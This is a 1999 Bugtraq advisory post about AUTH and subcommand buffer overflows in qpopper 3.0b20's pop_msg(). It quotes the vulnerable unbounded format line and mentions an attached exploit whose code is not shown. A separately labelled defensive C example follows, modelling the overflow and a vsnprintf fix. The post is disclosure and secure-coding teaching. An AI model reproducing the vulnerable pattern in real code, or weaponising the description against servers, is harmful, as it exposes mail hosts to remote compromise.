[12785] in bugtraq
qpop3.0b20 and below - notes and exploit
daemon@ATHENA.MIT.EDU (Lucid Solutions)
Wed Dec 1 12:05:22 1999
Message-Id: <Pine.LNX.4.10.9911301500310.26891-200000@terra.nebula.org>
Date: Tue, 30 Nov 1999 15:25:25 -0500
Reply-To: Lucid Solutions <lucid@TERRA.NEBULA.ORG>
From: Lucid Solutions <lucid@TERRA.NEBULA.ORG>
X-To: BUGTRAQ@SECURITYFOCUS.COM, eudora-custserv@eudora.com
To: BUGTRAQ@SECURITYFOCUS.COM
I found this overflow myself earlier this month. Seems someone
else recently found it before Qualcomm was able to issue a patch. The 2.x
series is not vulnerable because AUTH is not yet supported and the error
returned by attempting to use AUTH does not call pop_msg() with any user
input.
There is also another overflow besides the AUTH overflow, which can
occur if a valid username and password are first entered, also occurring in
pop_msg().
pop_get_subcommand.c contains this line near the bottom in qpopper3.0b20:
pop_msg(p,POP_FAILURE,
"Unknown command: \"%s %s\".",p->pop_command,p->pop_subcommand);
No bounds checking is done on the attempted subcommand. It is
interesting to note that in qpop 2.53, a similar line is used, but with
limits on the string length!
pop_msg(p,POP_FAILURE,
"Unknown command: \"%.128s %.128s\".",p->pop_command,
p->pop_subcommand);
I guess Qualcomm did not continue development of Qpopper directly from the
2.53 series, but rewrote code from scratch and/or based it on earlier
code.
As a solution, pop_msg() should also do bounds checking, and not make the
calling line responsible for it (although that's good practice too).
Attached is my original exploit that works on *BSD and Linux. (Solaris is
NOT vulnerable to the AUTH overflow). Slight modification is needed on
one line as the comments say. This exploit will actually work on the
majority of machines then. Qualcomm: you have already received my working
exploit with no modification needed.
Let's hope for an official patch soon.
- sk8@lucid-solutions.com
http://www.lucid-solutions.com
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="q3combo-public.c"
Content-Disposition: attachment; filename="q3combo-public.c"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--2110849577-815205743-943993525=:26891--
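The following is an added example, not part of the post above and not qpopper's code: a minimal model of the pop_msg() pattern the post describes. The POP struct, the MSG_BUF reply-buffer size, the FIELD_MAX field size, the helper names and the 600-byte subcommand are all assumptions constructed for illustration. It shows why the unbounded "%s %s" format in 3.0b20 overruns a fixed reply buffer, and puts the bounds check inside pop_msg() itself (via vsnprintf) as the post recommends, keeping the 2.53-style "%.128s" caller limit as defence in depth.

```c
/* Added example (not qpopper's code). Struct, sizes and names are assumptions. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_BUF   256   /* assumed size of the reply buffer pop_msg() fills */
#define FIELD_MAX 1024  /* assumed size of the parsed command/subcommand fields */

typedef struct {
    char pop_command[FIELD_MAX];
    char pop_subcommand[FIELD_MAX];   /* raw client input */
    char reply[MSG_BUF];
} POP;

/* Length the reply WOULD have under the 3.0b20 pattern: an unbounded "%s %s"
 * with the client's input, formatted into a fixed buffer. Measured with
 * snprintf(NULL, 0, ...) so nothing is written; a result >= MSG_BUF means a
 * vsprintf()-style pop_msg() would have written past reply[]. */
static int pop_msg_unbounded_len(const POP *p)
{
    return snprintf(NULL, 0, "-ERR Unknown command: \"%s %s\".\r\n",
                    p->pop_command, p->pop_subcommand);
}

/* Hardened pop_msg(): the bounds check lives in pop_msg() itself, so no
 * caller's format string can overrun reply[]. Returns the number of bytes
 * stored (excluding the NUL), after any truncation. */
static int pop_msg(POP *p, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(p->reply, sizeof p->reply, fmt, ap);
    va_end(ap);
    if (n < 0) {                       /* encoding error: emit nothing */
        p->reply[0] = '\0';
        return 0;
    }
    if ((size_t)n >= sizeof p->reply)  /* output was truncated to fit */
        n = (int)sizeof p->reply - 1;
    return n;
}

/* Caller-side limit as in 2.53: "%.128s" caps each argument. With the
 * hardened pop_msg() this is belt-and-braces, not the only protection. */
static int unknown_command(POP *p)
{
    return pop_msg(p, "-ERR Unknown command: \"%.128s %.128s\".\r\n",
                   p->pop_command, p->pop_subcommand);
}

/* Constructed sample request: command "AUTH" and a subcommand of sub_len 'A's. */
static void make_request(POP *p, size_t sub_len)
{
    memset(p, 0, sizeof *p);
    strcpy(p->pop_command, "AUTH");
    if (sub_len >= FIELD_MAX)
        sub_len = FIELD_MAX - 1;
    memset(p->pop_subcommand, 'A', sub_len);
    p->pop_subcommand[sub_len] = '\0';
}

int main(void)
{
    POP p;

    make_request(&p, 600);
    printf("unbounded reply would be %d bytes into a %d-byte buffer\n",
           pop_msg_unbounded_len(&p), MSG_BUF);
    printf("hardened reply is %d bytes: %s", unknown_command(&p), p.reply);
    return 0;
}
```

With a 600-byte subcommand the unbounded format needs 632 bytes, well past the assumed 256-byte buffer, while the hardened path stores 160 bytes and stays NUL-terminated. The point of moving the check into pop_msg() is that a later caller which forgets the "%.128s" precision (as the 3.0b20 line did) still cannot overrun the buffer.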